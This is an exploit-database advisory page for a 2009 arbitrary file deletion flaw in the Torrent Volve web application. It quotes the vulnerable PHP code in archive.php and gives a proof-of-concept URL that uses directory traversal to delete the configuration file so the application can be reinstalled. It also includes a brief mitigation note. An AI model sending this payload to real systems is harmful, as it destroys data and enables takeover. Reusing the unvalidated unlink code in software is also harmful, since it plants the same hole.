header-logo
Suggest Exploit
vendor:
Torrent Volve
by:
br0ly
7,5
CVSS
HIGH
Delete Arbitrary File
22
CWE
Product Name: Torrent Volve
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Torrent Volve

A vulnerability in Torrent Volve allows an attacker to delete arbitrary files. This is due to the lack of proper input validation in the 'archive.php' script. The script does not properly validate user-supplied input before using it to delete files. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal sequences and arbitrary file names. This will allow the attacker to delete arbitrary files on the affected system.

Mitigation:

Input validation should be performed to ensure that user-supplied input is properly sanitized before being used to delete files.
Source

Exploit-DB raw data:

----------------------------------------------------------------------------------------------------

  Name : Torrent Volve
  Site : http://sourceforge.net/projects/torrentvolve/
  Down : http://sourceforge.net/project/showfiles.php?group_id=179905&package_id=207933&release_id=476030

----------------------------------------------------------------------------------------------------

 
  Found By : br0ly
  Made in  : Brasil
  Contact  : br0ly[dot]Code[at]gmail[dot]com

----------------------------------------------------------------------------------------------------

  Description:

  Bug : Delete Arbitrary file.
     
  Look this in: archive.php; Lines 194 - 199

  if(isset($_GET['deleteTorrent'])) {

                //delete Torrent from file system
                unlink($userDir . '/' . $_GET['deleteTorrent']);
                echo '  <div class="divStatus">' . $_GET['deleteTorrent'] . ' deleted.</div>' . "\n";
        }
 
  Then after login we can delete files, if you delete the configuration file you can install the script again.
 

----------------------------------------------------------------------------------------------------

  P0c:
 
    http://localhost/Scripts/torrentvolve/archive.php?deleteTorrent=../../../config/configuration.xml

  To install again go to:

    http://localhost/Scripts/torrentvolve/
   

  OBS: need register_globals=on;

----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-06-11]

Navigation

Suggest Exploit

Services By CQR